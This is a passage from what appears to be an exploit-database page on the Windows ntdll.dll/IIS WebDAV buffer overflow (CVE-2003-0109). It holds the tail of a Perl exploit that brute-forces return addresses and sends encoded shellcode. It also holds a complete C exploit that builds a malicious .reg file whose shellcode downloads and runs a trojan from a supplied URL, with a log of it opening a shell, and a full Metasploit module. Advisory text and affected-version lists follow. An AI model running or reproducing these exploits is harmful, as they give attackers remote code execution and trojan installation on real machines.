 "%uc88d%u775b",
 "%uc89d%u72c2",
 "%uc89d%u775b",
 "%uc8ad%u72c2",
 "%uc8ad%u775b",
 "%uc8ba%u72c2",
 "%uc8ba%u775b",
 "%uc8c7%u72c2",
 "%uc8c7%u775b",
 "%uc8d4%u72c2",
 "%uc8d4%u775b",
 "%uc8e0%u77ac",
 "%uc8fc%u77db",
 "%uc936%u77db",
 "%uc9d3%u77ac",
 "%uc9f5%u6c0f",
 "%uca02%u77ac",
 "%uca25%u77ac",
 "%uca2e%u6c0f",
 "%uca5b%u77e9",
 "%uca84%u77e9",
 "%ucad1%u77e9",
 "%ucaf1%u77e9",
 "%ucb4f%u749e",
 "%ucb72%u76ae",
 "%ucb7a%u751a",
 "%ucb7b%u76ae",
 "%ucb7e%u7763",
 "%ucb85%u7763",
 "%ucb8f%u751a",
 "%ucb98%u749e",
 "%ucba4%u751a",
 "%ucbae%u749f",
 "%ucbd0%u77db",
 "%ucc05%u749f",
 "%ucc53%u76ae",
 "%ucc81%u6df5",
 "%ucc89%u6df5",
 "%ucc8a%u76ae",
 "%uccb5%u7901",
 "%uccc7%u760d",
 "%uccd6%u741b",
 "%uccda%u760d",
 "%ucd00%u741b",
 "%ucd0f%u7901",
 "%ucd2a%u741b",
 "%ucd31%u7901",
 "%ucd3c%u7518",
 "%ucd3c%u7901",
 "%ucdb0%u7761",
 "%ucdb5%u7761",
 "%ucdb8%u7761",
 "%ucdf4%u741b",
 "%ucdf9%u77e5",
 "%uce2e%u7518",
 "%uce46%u741b",
 "%uce6a%u77e5",
 "%uce74%u7518",
 "%uce93%u77e5",
 "%uce98%u7518",
 "%ucf69%u6df5",
 "%ucf71%u6df5",
 "%ucf9c%u76ae",
 "%ucfa6%u76ae",
 "%ud067%u77db",
 "%ud0a2%u77db",
 "%ud0c5%u6b32",
 "%ud109%u6b32",
 "%ud11b%u77dc",
 "%ud163%u7901",
 "%ud17c%u7900",
 "%ud181%u7900",
 "%ud1a6%u749f",
 "%ud1d2%u77ac",
 "%ud1e0%u7901",
 "%ud1ed%u77ac",
 "%ud1f7%u749f",
 "%ud1f7%u7900",
 "%ud1fc%u7900",
 "%ud206%u7763",
 "%ud21c%u7834",
 "%ud221%u7763",
 "%ud225%u7834",
 "%ud259%u6df5",
 "%ud279%u749f",
 "%ud287%u7834",
 "%ud290%u7834",
 "%ud2b6%u77e5",
 "%ud2cd%u7900",
 "%ud2d2%u7900",
 "%ud2e1%u741b",
 "%ud2f5%u741b",
 "%ud2f5%u77e5",
 "%ud309%u741b",
 "%ud31d%u741b",
 "%ud38a%u7901",
 "%ud3aa%u7763",
 "%ud3b9%u7763",
 "%ud3bf%u7901",
 "%ud3d7%u7763",
 "%ud3db%u77dc",
 "%ud4f5%u6b32",
 "%ud514%u77ac",
 "%ud51e%u77ac",
 "%ud52d%u77e5",
 "%ud539%u6b32",
 "%ud541%u6df5",
 "%ud545%u7800",
 "%ud6dc%u77d7",
 "%ud6e2%u77a5",
 "%ud700%u77e2",
 "%ud75b%u7900",
 "%ud780%u7900",
 "%ue00e%u7900",
 "%ue010%u7738",
 "%ue020%u77db",
 "%ue02b%u77ac",
 "%ue04c%u7738",
 "%ue04e%u6ed4",
 "%ue056%u6ed4",
 "%ue0ad%u779e",
 "%ue0af%u7800",
 "%uec00%u672e",
 "%uf906%u7800",
 "%uf909%u7763",
 "%uf93f%u7763",
 "%uf942%u751a",
 "%uf94b%u77e9",
 "%uf964%u77ac",
 "%uf966%u7763",
 "%uf968%u751a",
 "%uf974%u77ac",
 "%uf981%u751a",
 "%uf991%u7763",
 "%uf9a6%u7300",
 "%uf9b3%u751a",
 "%uf9c2%u7763",
 "%uf9cd%u751a",
 "%uf9e9%u7763",
 "%uf9fb%u7300"
);


foreach my $return_address (@return_addresses)
{
 ######### return address ############
 my $return_address_part="";
 $return_address_part="";
 $return_address_part.="%u3073";
 $return_address_part.="%u3075";
 $return_address_part.="%u3074";
 $return_address_part.=$return_address;
 $return_address_part.="%ucc38"x22;
 #####################################

 ############  offsets ##############
 my $offset_len=280;
 my $offset_part="X"x$offset_len;
 #####################################
 my $shellcode_len=$url_len-(length($return_address_part)/6+$offset_len);

 my $offset_of_part_shell=0;
 print "len-> $url_len=$shellcode_len:$offset_len\n";


 my $decoder_str="%uC931%u79B1%uc1fe%ucb01%uc38b%uc789%uc289%uc931%u9041%u9041%uc38b%uc801%u338b%uce8b%u308b%uc68b%uc801%u00b4%uc689%uc78b%u3089%uc931%u03b1%u9041%ucb01%u9047%uf989%ud129%uc031%ue0b0%u03b4%uc129%uc985%uca75%uc985";
 my $decoder_str_len=length($decoder_str)/6;
 my $patch_esp="\x44\x45\x76\x76";
 my $nop="%u0048%u0048";
 my $encoded_str="${nop}${patch_esp}${shellcode}";
 my $unicoded_encoded_str_len=4*5;

 my $shellcode_part="";
 $shellcode_part="";
 $shellcode_part.=$decoder_str;
 $shellcode_part.=$encoded_str;
 $shellcode_part.="A"x($shellcode_len-($decoder_str_len+length($encoded_str)-$unicoded_encoded_str_len-1));

 my $url="/${offset_part}${return_address_part}${shellcode_part}";
 for my $METHOD ("LOCK")
 {
  my $string_to_send="$METHOD $url HTTP/1.1\r\n${host_header}${destination}${lock_token}${translate_f}${depth}Content-Type: text/xml\r\nContent-Length: $length_of_body\r\n${connection_str}\r\n${body}";
  my $results="";
  $results="";
  while($results eq "")
  {
   print STDERR "Retrying Connection...\n";
   $results=sendraw2("GET / HTTP/1.0\r\n\r\n",$host,$port,15);
   if($results eq "")
   {
    sleep(1);
   }
  }
  print STDERR "Trying with [$return_address]\n";
  $results=sendraw2($string_to_send,$host,$port,15);
  if($results eq "")
  {
   print "Connection refused: Server crashed?\n";
  }else{
   print "Failed to exploit: Server not crashed\n";
  }
 }
}

sub sendraw2
{
 my ($pstr,$realip,$realport,$timeout)=@_;
 my $target2=inet_aton($realip);

 my $flagexit=0;
 $SIG{ALRM}=\&ermm;
 socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || return "0";
 #die("Socket problems");
 alarm($timeout);
 if(connect(S,pack "SnA4x8",2,$realport,$target2))
 {
  alarm(0);
  my @in;
  select(S); $|=1;
  print $pstr;
  alarm($timeout);
  while(<S>){
   if($flagexit == 1)
   {
    close (S);
    return "Timeout";
   }
   push @in, $_;
  }
  alarm(0);
  select(STDOUT);
  close(S);
  return join '',@in;
        }else{
  close(S);
  return "";
 }
}

sub ermm
{
 $flagexit=1;
 close (S);
}		

- 漏洞信息 (22366)

Microsoft Windows XP/2000/NT 4 ntdll.dll Buffer Overflow Vulnerability (2) (EDBID:22366)
windows remote
2003-03-31 Verified
0 ThreaT
N/A [点击下载]
source: http://www.securityfocus.com/bid/7116/info
 
The Windows library ntdll.dll includes a function that does not perform sufficient bounds checking. The vulnerability is present in the function "RtlDosPathNameToNtPathName_U" and may be exploited through other programs that use the library if an attack vector permits it. One of these programs is the implementation of WebDAV that ships with IIS 5.0. The vector allows for the vulnerability in ntdll.dll to be exploited by a remote attacker.
 
Several other library functions which call the vulnerable ntdll.dll procedure have been identified. Administrators are advised to patch as other attack vectors are likely to surface.
 
** Microsoft has revised its advisory to state that this vulnerability affects Windows NT systems. As Windows NT does not support WebDAV, exploits using WebDAV as the attack vector will not be effective against Windows NT systems. Windows XP does not also include WebDAV by default, but other attack vectors may be possible, especially in cases where the attacker has interactive access to the system. WebDAV may be installed by a user on Windows XP with IIS 5.1, so WebDAV may be a possible means of exploitation in these circumstances.
 
** Reports suggest that numerous hosts have been scanned in an attempt to exploit this vulnerability. Although unconfirmed, this may be the result of a system of automated attacks.
 
** It has been reported that this vulnerability is also present in the "RtlGetFullPathName_U" function. The supplied Microsoft patch (Q815021) also corrects this function.
 
** It has been reported that the W32.Welchia.Worm, described in MCID 1811, is actively exploiting this vulnerability.

/***************************************
 *@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@*
 *@ REGEDIT Buffer Overflow Exploit ! @*
 *@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@*
 *                                     *
 *   Discovered & coded By ThreaT.     *
 *                                     *
 *#####################################*
 *# -> ThreaT@Ifrance.com             #*
 *# -> http://www.chez.com/mvm        #*
 *# -> http://s0h.cc/~threat          #*
 *#####################################*
 * Date : 31/03/2003                   *
 ***************************************
*/

/*
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 * This exploit create a malicious .reg file  *
 * that when it try to write data into the    *
 * registery, overwrite the ret addr, because * 
 * a ReadFile() unchecked function work with  *
 * a static buffer, and execute our abitrary  *
 * code who download a trojan for local       *
 * execution without user ask !               *
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 -> compile : cl regexploit.c

  usage : regexploit.exe <url>

  <url> is a full link to an executable file, it can be like
  http://www.host.com/trojan.exe or file://c:/path/executable.exe

*/

// Tested on Win2k pro & server (fr) SP0 SP1 SP2 & SP3

#include <windows.h>

HANDLE RegFile;

char *ToWideChar(const char *cszANSIstring) 
{
	int nBufSize;
	WCHAR *wideString;

	if(cszANSIstring == NULL) return NULL; 

	nBufSize = MultiByteToWideChar(CP_ACP, MB_PRECOMPOSED, cszANSIstring, -1, NULL, 0 );
	wideString = (WCHAR *)malloc(nBufSize +1);
	MultiByteToWideChar(CP_ACP, MB_PRECOMPOSED, cszANSIstring, -1, wideString, nBufSize);
	return (char*)(wideString);
}

void Write (const char *str, int number)
{
	DWORD lpNumberOfBytesWritten;
	WriteFile (RegFile,str,number,&lpNumberOfBytesWritten,NULL);
}

void main (int argc, char *argv[])
{
	int i;
	char entete[] = "Windows Registry Editor Version 5.00\r\n\r\n"
			"[HKEY_LOCAL_MACHINE\\SOFTWARE\\Discovered\\and\\coded\\by\\ThreaT]\r\n",

	*MastaBuff, *myurl,

	RealGenericShellcode[] = 

	"\xAA\xC6\x02\x01" // Adresse de retour

	// nop
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"

	// decrypteur de shellcode
	"\x68\x5E\x56\xC3\x90\x8B\xCC\xFF\xD1\x83\xC6\x0E\x90\x8B\xFE\xAC"
	"\x34\x99\xAA\x84\xC0\x75\xF8"

	// shellcode xorised avec 0x99
	"\x72\xeb\xf3\xa9\xc2\xfd\x12\x9a\x12\xd9\x95\x12\xd1\x95\x12\x58\x12\xc5\xbd\x91"
	"\x12\xe9\xa9\x9a\xed\xbd\x9d\xa1\x87\xec\xd5\x12\xd9\x81\x12\xc1\xa5\x9a\x41\x12"
	"\xc2\xe1\x9a\x41\x12\xea\x85\x9a\x69\xcf\x12\xea\xbd\x9a\x69\xcf\x12\xca\xb9\x9a"
	"\x49\x12\xc2\x81\xd2\x12\xad\x03\x9a\x69\x9a\xed\xbd\x8d\x12\xaf\xa2\xed\xbd\x81"
	"\xed\x93\xd2\xba\x42\xec\x73\xc1\xc1\xaa\x59\x5a\xc6\xaa\x50\xff\x12\x95\xc6\xc6"
	"\x12\xa5\x16\x14\x9d\x9e\x5a\x12\x81\x12\x5a\xa2\x58\xec\x04\x5a\x72\xe5\xaa\x42"
	"\xf1\xe0\xdc\xe1\xd8\xf3\x93\xf3\xd2\xca\x71\xe2\x66\x66\x66\xaa\x50\xc8\xf1\xec"
	"\xeb\xf5\xf4\xff\x5e\xdd\xbd\x9d\xf6\xf7\x12\x75\xc8\xc8\xcc\x66\x49\xf1\xf0\xf5"
	"\xfc\xd8\xf3\x97\xf3\xeb\xf3\x9b\x71\xcc\x66\x66\x66\xaa\x42\xca\xf1\xf8\xb7\xfc"
	"\xe1\x5f\xdd\xbd\x9d\xfc\x12\x55\xca\xca\xc8\x66\xec\x81\xca\x66\x49\xaa\x42\xf1"
	"\xf0\xf7\xdc\xe1\xf3\x98\xf3\xd2\xca\x71\xb5\x66\x66\x66\x14\xd5\xbd\x89\xf3\x98"
	"\xc8\x66\x49\xaa\x42\xf1\xe1\xf0\xed\xc9\xf3\x98\xf3\xd2\xca\x71\x8b\x66\x66\x66"
	"\x66\x49\x71\xe6\x66\x66\x66";

	printf ("@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n"
		"Regedit.exe Buffer Overflow Exploit\n"
		"@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n"
		"Discovered & Coded By ThreaT.\n\n"
		"contact : ThreaT@Ifrance.com\n"
		"URL : http://www.chez.com/mvm\n\n");

	if (!argv[1])
	{
		printf ("_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_\n"
			"Usage   : regexploit.exe <URL://trojan.exe>\n"
			"Exemple : regexploit.exe file://c:/winnt/system32/cmd.exe\n"
			"_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_\n");
		ExitProcess (0);
	}

	/* Creation du fichier Reg malicieux */

	RegFile = CreateFile ("VulnFile.reg",GENERIC_WRITE,FILE_SHARE_WRITE,
			     NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,NULL);

	if (RegFile == INVALID_HANDLE_VALUE)
	{
		printf ("Cannot create a vuln regfile !\n");
		ExitProcess (0);
	}

	Write ("\xFF\xFE",2); // header .reg script
	Write (ToWideChar (entete),strlen (entete)*2); // entê regedit
	
	MastaBuff = (char *) LocalAlloc (LPTR,270);		// rempli la premiere partie
	MastaBuff[0] = '"';	memset (&MastaBuff[1],'0',260); // avec des zeros
														
	Write (ToWideChar (MastaBuff),strlen (MastaBuff)*2); // Ecrit dans le fichier la 1er parti de la vuln str

	myurl = (char *) LocalAlloc (LPTR, strlen (argv[1])+10);
	lstrcpy (myurl,argv[1]);

	for (i=0; i < strlen (argv[1]); argv[1][i++]^=0x99); // encrypte l'URL
	lstrcat (RealGenericShellcode,argv[1]); // creation du shellcode final
	lstrcat (RealGenericShellcode,"\x99");  // caractere de terminaison

	Write (RealGenericShellcode,strlen (RealGenericShellcode)); // rajoute le shellcode au fichier

	CloseHandle (RegFile);

	printf ("un fichier .reg vulnerable appele VulnFile.reg viens d'etre cree\n"
		"pour downloader et executer '%s'\n",myurl);

}

/*********************

D:\code\exploits\regedit>cl regexploit.c
Microsoft (R) 32-bit C/C++ Optimizing Compiler Version 12.00.8168 for 80x86
Copyright (C) Microsoft Corp 1984-1998. All rights reserved.

regexploit.c
Microsoft (R) Incremental Linker Version 6.00.8168
Copyright (C) Microsoft Corp 1992-1998. All rights reserved.

/out:regexploit.exe
regexploit.obj

D:\code\exploits\regedit>regexploit
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Regedit.exe Buffer Overflow Exploit
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Discovered & Coded By ThreaT.

contact : ThreaT@Ifrance.com
URL : http://www.chez.com/mvm

_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_
Usage   : regexploit.exe <URL://trojan.exe>
Exemple : regexploit.exe file://c:/winnt/system32/cmd.exe
_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_

D:\code\exploits\regedit>regexploit file://c:/winnt/system32/cmd.exe
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Regedit.exe Buffer Overflow Exploit
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Discovered & Coded By ThreaT.

contact : ThreaT@Ifrance.com
URL : http://www.chez.com/mvm

un fichier .reg vulnerable appele VulnFile.reg viens d'etre cree
pour downloader et executer 'file://c:/winnt/system32/cmd.exe'

D:\code\exploits\regedit>dir VulnFile.reg
 Le volume dans le lecteur D n'a pas de nom.
 Le numé de sée du volume est 90CC-3FC3

 Rértoire de D:\code\exploits\regedit

31/03/2003  14:54                1 015 VulnFile.reg
               1 fichier(s)            1 015 octets
               0 Rés)   5 602 033 664 octets libres

D:\code\exploits\regedit>VulnFile.reg

D:\code\exploits\regedit>

  ês vous sû vouloir ajouter l'information dans d:\code\exploits\regedit\VulnFile.reg 
  dans le registre ?

  -> OUI

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.

D:\code\exploits\regedit>


  this is too easy...

*********************/
		

- 漏洞信息 (22367)

Microsoft Windows XP/2000/NT 4 ntdll.dll Buffer Overflow Vulnerability (3) (EDBID:22367)
windows remote
2003-04-04 Verified
0 Morning Wood
N/A [点击下载]
source: http://www.securityfocus.com/bid/7116/info
 
The Windows library ntdll.dll includes a function that does not perform sufficient bounds checking. The vulnerability is present in the function "RtlDosPathNameToNtPathName_U" and may be exploited through other programs that use the library if an attack vector permits it. One of these programs is the implementation of WebDAV that ships with IIS 5.0. The vector allows for the vulnerability in ntdll.dll to be exploited by a remote attacker.
 
Several other library functions which call the vulnerable ntdll.dll procedure have been identified. Administrators are advised to patch as other attack vectors are likely to surface.
 
** Microsoft has revised its advisory to state that this vulnerability affects Windows NT systems. As Windows NT does not support WebDAV, exploits using WebDAV as the attack vector will not be effective against Windows NT systems. Windows XP does not also include WebDAV by default, but other attack vectors may be possible, especially in cases where the attacker has interactive access to the system. WebDAV may be installed by a user on Windows XP with IIS 5.1, so WebDAV may be a possible means of exploitation in these circumstances.
 
** Reports suggest that numerous hosts have been scanned in an attempt to exploit this vulnerability. Although unconfirmed, this may be the result of a system of automated attacks.
 
** It has been reported that this vulnerability is also present in the "RtlGetFullPathName_U" function. The supplied Microsoft patch (Q815021) also corrects this function.
 
** It has been reported that the W32.Welchia.Worm, described in MCID 1811, is actively exploiting this vulnerability.

http://www.exploit-db.com/sploits/22367.zip		

- 漏洞信息 (22368)

Microsoft Windows XP/2000/NT 4 ntdll.dll Buffer Overflow Vulnerability (4) (EDBID:22368)
windows remote
2003-03-17 Verified
0 aT4r@3wdesign.es
N/A [点击下载]
source: http://www.securityfocus.com/bid/7116/info
  
The Windows library ntdll.dll includes a function that does not perform sufficient bounds checking. The vulnerability is present in the function "RtlDosPathNameToNtPathName_U" and may be exploited through other programs that use the library if an attack vector permits it. One of these programs is the implementation of WebDAV that ships with IIS 5.0. The vector allows for the vulnerability in ntdll.dll to be exploited by a remote attacker.
  
Several other library functions which call the vulnerable ntdll.dll procedure have been identified. Administrators are advised to patch as other attack vectors are likely to surface.
  
** Microsoft has revised its advisory to state that this vulnerability affects Windows NT systems. As Windows NT does not support WebDAV, exploits using WebDAV as the attack vector will not be effective against Windows NT systems. Windows XP does not also include WebDAV by default, but other attack vectors may be possible, especially in cases where the attacker has interactive access to the system. WebDAV may be installed by a user on Windows XP with IIS 5.1, so WebDAV may be a possible means of exploitation in these circumstances.
  
** Reports suggest that numerous hosts have been scanned in an attempt to exploit this vulnerability. Although unconfirmed, this may be the result of a system of automated attacks.
  
** It has been reported that this vulnerability is also present in the "RtlGetFullPathName_U" function. The supplied Microsoft patch (Q815021) also corrects this function.
  
** It has been reported that the W32.Welchia.Worm, described in MCID 1811, is actively exploiting this vulnerability.

http://www.exploit-db.com/sploits/22368.tar.gz		

- 漏洞信息 (F83237)

Microsoft IIS 5.0 WebDAV ntdll.dll Path Overflow (PacketStormID:F83237)
2009-11-26 00:00:00
H D Moore  metasploit.com
exploit,overflow
windows,2k
CVE-2003-0109
[点击下载]

This exploits a buffer overflow in NTDLL.dll on Windows 2000 through the SEARCH WebDAV method in IIS. This particular module only works against Windows 2000. It should have a reasonable chance of success against any service pack.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'Microsoft IIS 5.0 WebDAV ntdll.dll Path Overflow',
			'Description'    => %q{
				This exploits a buffer overflow in NTDLL.dll on Windows 2000
				through the SEARCH WebDAV method in IIS. This particular
				module only works against Windows 2000. It should have a
				reasonable chance of success against any service pack.
			},
			'Author'         => [ 'hdm' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					[ 'CVE', '2003-0109'],
					[ 'OSVDB', '4467'],
					[ 'BID', '7116'],
					[ 'MSB', 'MS03-007'],

				],
			'Privileged'     => false,
			'Payload'        =>
				{
					'Space'    => 512,
					'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        => 
				[
					[ 'Automatic Brute Force', { } ],
				],
			'DisclosureDate' => 'May 30 2003',
			'DefaultTarget' => 0))

		register_evasion_options([
				OptBool.new('invalid_search_request', [false, 'Replace the valid XML search with random data', 'false']),

				# XXX - ugh, there has to be a better way to remove entries from an
				# enum that overwriting the evalable enum option
				OptEnum.new('HTTP::uri_encode', [false, 'Enable URI encoding', 'none', ['none','hex-normal'], 'none'])
			], self.class
		)

		deregister_options('HTTP::junk_params', 'HTTP::header_folding')
	end

	def autofilter
		rport = datastore['RPORT'].to_i
		if ( rport == 139 or rport == 445 )
			rport = 80
		end
		
		true
	end
	
	def check
		url = 'x' * 65535
		xml =
			"<?xml version=\"1.0\"?>\r\n<g:searchrequest xmlns:g=\"DAV:\">\r\n" +
			"<g:sql>\r\nSelect \"DAV:displayname\" from scope()\r\n</g:sql>\r\n</g:searchrequest>\r\n"
				
		response = send_request_cgi({
			'uri'     => '/' + url,
			'ctype'   => 'text/xml',
			'method'  => 'SEARCH',
			'data'    => xml
		}, 5)
		

		if (response and response.body =~ /Server Error\(exception/)
			return Exploit::CheckCode::Vulnerable	
		end

		# Did the server stop acceping requests?
		begin
			send_request_raw({'uri' => '/'}, 5)
		rescue
			return Exploit::CheckCode::Vulnerable
		end

		return Exploit::CheckCode::Safe
	end

	def exploit
		# verify the service is running up front
		send_request_raw({'uri' => '/'}, 5)

		# The targets in the most likely order they will work
		targets =
		[
			# Almost Targetted :)
			"\x4f\x4e", # =SP3
			"\x41\x42", # ~SP0  ~SP2
			"\x41\x43", # ~SP1, ~SP2

			# Generic Bruteforce
			"\x41\xc1",
			"\x41\xc3",
			"\x41\xc9",
			"\x41\xca",
			"\x41\xcb",
			"\x41\xcc",
			"\x41\xcd",
			"\x41\xce",
			"\x41\xcf",
			"\x41\xd0",
		]

		xml =
			"<?xml version=\"1.0\"?>\r\n<g:searchrequest xmlns:g=\"DAV:\">\r\n" +
			"<g:sql>\r\nSelect \"DAV:displayname\" from scope()\r\n</g:sql>\r\n</g:searchrequest>\r\n"
	
		if datastore['invalid_search_request'] == true
			xml = rand_text(rand(1024) + 32)
		end

		# The nop generator can be cpu-intensive for large buffers, so we use a static sled of 'A'
		# This decodes to "inc ecx"
		
		url = 'A' * 65516
		url[ url.length - payload.encoded.length, payload.encoded.length ] = payload.encoded
				
		targets.each { |ret|
			
			print_status("Trying return address 0x%.8x..." % Rex::Text.to_unicode(ret).unpack('V')[0])
			url[ 283, 2 ] = ret
	
			begin
				send_request_cgi({
					'uri'     => '/' + url,
					'ctype'   => 'text/xml',
					'method'  => 'SEARCH',
					'data'    => xml
				}, 5)
				handler
			rescue => e
				print_error("Attempt failed: #{e}")
			end
			
			1.upto(8) { |i|
				sleep(0.25)
				return if self.session_created?
			}
			
			if !service_running?
				print_error('Giving up, IIS must have completely crashed')
				return
			end
		}
	end

	# Try connecting to the server up to 20 times, with a two second gap
	# This gives the server time to recover after a failed exploit attempt
	def service_running?
		print_status('Checking if IIS is back up after a failed attempt...')
		1.upto(20) {|i|
			begin
				send_request_raw({'uri' => '/'}, 5)
			rescue
				print_status("Connection failed (#{i} of 20)...")
				sleep(2)
				next
			end
			return true
		}
		return false
	end

end
    

- 漏洞信息

4467
Microsoft Windows WebDav ntdll.dll Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Patch / RCS
Exploit Public, Exploit Commercial Uncoordinated Disclosure, Discovered in the Wild

- 漏洞描述

Windows servers with WebDAV enabled contain a flaw that may allow a remote attacker to execute arbitrary code. The issue is due to the ntdll.dll component of the WebDAV not properly sanitizing input to a path conversion function. If an attacker sends a specially crafted request to this function, they may be able to execute arbitrary code with SYSTEM privileges.

- 时间线

2003-05-30 2003-04-24
2003-05-30 Unknow

- 解决方案

Microsoft has released a patch to address this vulnerability. It is also possible to correct the flaw by implementing the following workarounds): 1. Disable IIS if not required 2. Disable WebDav if not required

- 相关参考

- 漏洞作者

- 漏洞信息

Microsoft Windows ntdll.dll Buffer Overflow Vulnerability
Boundary Condition Error 7116
Yes No
2003-03-17 12:00:00 2009-07-11 09:06:00
Announced by the vendor.

- 受影响的程序版本

Microsoft Windows XP Professional SP1
Microsoft Windows XP Professional
Microsoft Windows XP Home SP1
Microsoft Windows XP Home
Microsoft Windows XP 64-bit Edition SP1
Microsoft Windows XP 64-bit Edition
Microsoft Windows NT Workstation 4.0 SP6a
Microsoft Windows NT Workstation 4.0 SP6
Microsoft Windows NT Workstation 4.0 SP5
Microsoft Windows NT Workstation 4.0 SP4
Microsoft Windows NT Workstation 4.0 SP3
Microsoft Windows NT Workstation 4.0 SP2
Microsoft Windows NT Workstation 4.0 SP1
Microsoft Windows NT Workstation 4.0
Microsoft Windows NT Terminal Server 4.0 SP6
Microsoft Windows NT Terminal Server 4.0 SP5
Microsoft Windows NT Terminal Server 4.0 SP4
Microsoft Windows NT Terminal Server 4.0 SP3
Microsoft Windows NT Terminal Server 4.0 SP2
Microsoft Windows NT Terminal Server 4.0 SP1
Microsoft Windows NT Terminal Server 4.0
Microsoft Windows NT Server 4.0 SP6a
+ Avaya DefinityOne Media Servers
+ Avaya DefinityOne Media Servers
+ Avaya IP600 Media Servers
+ Avaya IP600 Media Servers
+ Avaya S3400 Message Application Server 0
+ Avaya S8100 Media Servers 0
+ Avaya S8100 Media Servers 0
Microsoft Windows NT Server 4.0 SP6
Microsoft Windows NT Server 4.0 SP5
Microsoft Windows NT Server 4.0 SP4
Microsoft Windows NT Server 4.0 SP3
Microsoft Windows NT Server 4.0 SP2
Microsoft Windows NT Server 4.0 SP1
Microsoft Windows NT Server 4.0
Microsoft Windows NT Enterprise Server 4.0 SP6a
Microsoft Windows NT Enterprise Server 4.0 SP6
Microsoft Windows NT Enterprise Server 4.0 SP5
Microsoft Windows NT Enterprise Server 4.0 SP4
Microsoft Windows NT Enterprise Server 4.0 SP3
Microsoft Windows NT Enterprise Server 4.0 SP2
Microsoft Windows NT Enterprise Server 4.0 SP1
Microsoft Windows NT Enterprise Server 4.0
Microsoft Windows 2000 Terminal Services SP3
Microsoft Windows 2000 Terminal Services SP2
+ Microsoft Windows 2000 Advanced Server SP2
+ Microsoft Windows 2000 Datacenter Server SP2
+ Microsoft Windows 2000 Server SP2
Microsoft Windows 2000 Terminal Services SP1
Microsoft Windows 2000 Terminal Services
+ Microsoft Windows 2000 Advanced Server
+ Microsoft Windows 2000 Datacenter Server
+ Microsoft Windows 2000 Server
Microsoft Windows 2000 Server SP3
Microsoft Windows 2000 Server SP2
Microsoft Windows 2000 Server SP1
Microsoft Windows 2000 Server
+ Avaya DefinityOne Media Servers
+ Avaya IP600 Media Servers
+ Avaya S3400 Message Application Server 0
+ Avaya S8100 Media Servers 0
Microsoft Windows 2000 Professional SP3
Microsoft Windows 2000 Professional SP2
Microsoft Windows 2000 Professional SP1
Microsoft Windows 2000 Professional
Microsoft Windows 2000 Datacenter Server SP3
Microsoft Windows 2000 Datacenter Server SP2
Microsoft Windows 2000 Datacenter Server SP1
Microsoft Windows 2000 Datacenter Server
Microsoft Windows 2000 Advanced Server SP3
Microsoft Windows 2000 Advanced Server SP2
Microsoft Windows 2000 Advanced Server SP1
Microsoft Windows 2000 Advanced Server
Cisco Wireless Lan Solution Engine
Cisco VPN/Security Management Solution
Cisco Voice Manager
Cisco User Registration Tool
Cisco uOne Enterprise Edition
Cisco Unity Server 4.0
Cisco Unity Server 3.3
Cisco Unity Server 3.2
Cisco Unity Server 3.1
Cisco Unity Server 3.0
Cisco Unity Server 2.46
Cisco Unity Server 2.4
Cisco Unity Server 2.3
Cisco Unity Server 2.2
Cisco Unity Server 2.1
Cisco Unity Server 2.0
Cisco Unity Server
Cisco Transport Manager
Cisco Trailhead
Cisco SN 5428 Storage Router SN5428-3.3.2-K9
Cisco SN 5428 Storage Router SN5428-3.3.1-K9
Cisco SN 5428 Storage Router SN5428-3.2.2-K9
Cisco SN 5428 Storage Router SN5428-3.2.1-K9
Cisco SN 5428 Storage Router SN5428-2.5.1-K9
Cisco SN 5428 Storage Router SN5428-2-3.3.2-K9
Cisco SN 5428 Storage Router SN5428-2-3.3.1-K9
Cisco SN 5420 Storage Router 1.1.3
Cisco SN 5420 Storage Router 1.1 (7)
Cisco SN 5420 Storage Router 1.1 (5)
Cisco SN 5420 Storage Router 1.1 (4)
Cisco SN 5420 Storage Router 1.1 (3)
Cisco SN 5420 Storage Router 1.1 (2)
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows ME
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0
Cisco Small Network Management Solution
Cisco Service Management
Cisco Secure Scanner
Cisco Secure Policy Manager 3.0.1
